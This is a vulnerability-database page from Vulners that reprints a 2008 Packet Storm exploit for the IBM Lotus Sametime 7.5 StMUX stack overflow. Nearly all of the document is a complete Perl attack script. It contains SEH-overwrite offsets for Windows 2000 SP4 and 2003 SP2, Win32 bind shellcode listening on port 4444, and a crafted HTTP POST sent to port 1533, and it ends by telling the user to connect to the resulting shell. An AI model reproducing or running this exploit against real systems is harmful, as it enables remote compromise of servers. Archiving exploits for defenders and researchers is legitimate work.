Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sametime-exploit.txt

🗓️ 22 May 2008 00:00:00Reported by Manuel Santamarina SuarezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

IBM Lotus Sametime" StMUX Stack Overflow Exploit by Manuel Santamarina Suarez, affecting versions 7.5 on Windows Server 2000 SP4 and Windows Server 2003 SP2, through a crafted TCP packet to exploit a Stack Overflow vulnerability

Code
`#!perl  
#  
# "IBM Lotus Sametime" StMUX Stack Overflow Exploit  
#  
# Author: Manuel Santamarina Suarez  
# e-Mail: [email protected]  
#  
  
use IO::Socket;  
use File::Basename;  
  
#  
# destination TCP port  
#  
$port = 1533;  
  
#  
# SE handler  
#  
# Don't use upper-case ASCII characters or 0x00, 0x0a, 0x0b, 0x0d, 0x20  
# You MUST use a POP/POP/RET sequence that doesn't modify the ESP register  
#  
$seh = reverse( "\x7C\x34\x10\xC2" ); # POP ECX/POP ECX/RET  
# msvcr71.7c3410c2  
# universal  
  
#  
# Shellcode  
#  
# Win32 Bind Shellcode (EXITFUNC=process, LPORT=4444)  
#  
$sc = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".  
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".  
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".  
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".  
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".  
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".  
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".  
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".  
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".  
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".  
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".  
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".  
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".  
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".  
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".  
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".  
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".  
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".  
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".  
"\x52\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0";  
  
#  
# JUMP to 'ESP adjustment' and shellcode  
#  
$jmp = "\x74\x23". # JE SHORT  
"\x75\x21"; # JNZ SHORT  
  
  
#  
#  
# Don't edit anything after this line  
#  
#  
  
  
sub usage {  
print "Usage: " . basename( $0 ) . " [target] [IPv4 address]\n".  
"Example: ". basename( $0 ) . " 1 192.168.1.32\n".  
"\n".  
"Targets:\n".  
"[1] Lotus Sametime 7.5 on Windows Server 2000 SP4\n".  
"[2] Lotus Sametime 7.5 on Windows Server 2003 SP2\n";  
exit;  
}  
  
  
# Net::IP::ip_is_ipv4  
sub ip_is_ipv4 {  
my $ip = shift;  
  
if (length($ip) < 7) {  
return 0;  
}  
  
unless ($ip =~ m/^[\d\.]+$/) {  
return 0;  
}  
  
if ($ip =~ m/^\./) {  
return 0;  
}  
  
if ($ip =~ m/\.$/) {  
return 0;  
}  
  
if ($ip =~ m/^(\d+)$/ and $1 < 256) {  
return 1  
}  
  
my $n = ($ip =~ tr/\./\./);  
  
unless ($n >= 0 and $n < 4) {  
return 0;  
}  
  
if ($ip =~ m/\.\./) {  
return 0;  
}  
  
foreach (split /\./, $ip) {  
unless ($_ >= 0 and $_ < 256) {  
return 0;  
}  
}  
  
return 1;  
}  
  
  
print "---------------------------------------------------\n".  
' "IBM Lotus Sametime" StMUX Stack Overflow Exploit'."\n".  
"---------------------------------------------------\n\n";  
  
if( ($#ARGV+1) != 2 ) {  
&usage;  
}  
  
# Windows 2000 SP4  
if( $ARGV[0] == 1 ) {  
$popad = "\x5b" x 3 . # POP EBX  
"\x61" x 268 . # POPAD  
"\xff\x24\x24"; # JMP DWORD PTR SS:[ESP]  
}  
# Windows 2003 SP2  
elsif( $ARGV[0] == 2 ) {  
$popad = "\x5b" x 3 . # POP EBX  
"\x61" x 269 . # POPAD  
"\xff\x24\x24"; # JMP DWORD PTR SS:[ESP]  
}  
else {  
&usage;  
}  
  
if( ip_is_ipv4( $ARGV[1] ) ) {  
$ip = $ARGV[1];  
}  
else  
{  
&usage;  
}  
  
print "[+] Connecting to $ip:$port...\n";  
  
$sock = IO::Socket::INET->new (  
PeerAddr => $ip,  
PeerPort => $port,  
Proto => 'tcp',  
Timeout => 2  
) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;  
  
print "[+] Connected.\n".  
"[+] Trying to overwrite and control the SE handler...\n";  
  
$path = "\x66" x 44 . $jmp . $seh . "\x66" x 29 . $popad;  
$sock->send (  
"POST /CommunityCBR/CC.39.$path/\r\n".  
"User-Agent: Sametime Community Agent\r\n".  
"Host: $ip:1533\r\n".  
"Content-Length: ". length( $sc ) ."\r\n".  
"Connection: Close\r\n".  
"Cache-Control: no-cache\r\n".  
"\r\n".  
$sc  
);  
  
sleep( 3 );  
close( $sock );  
  
print "[+] Done. Now check for a bind shell on $ip:4444!\n";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 May 2008 00:00Current
0.1Low risk
Vulners AI Score0.1
ibm lotus sametimestmuxstack overflowexploitmanuel santamarina suareztcpwindows server 2000 sp4windows server 2003 sp2vulnerability
20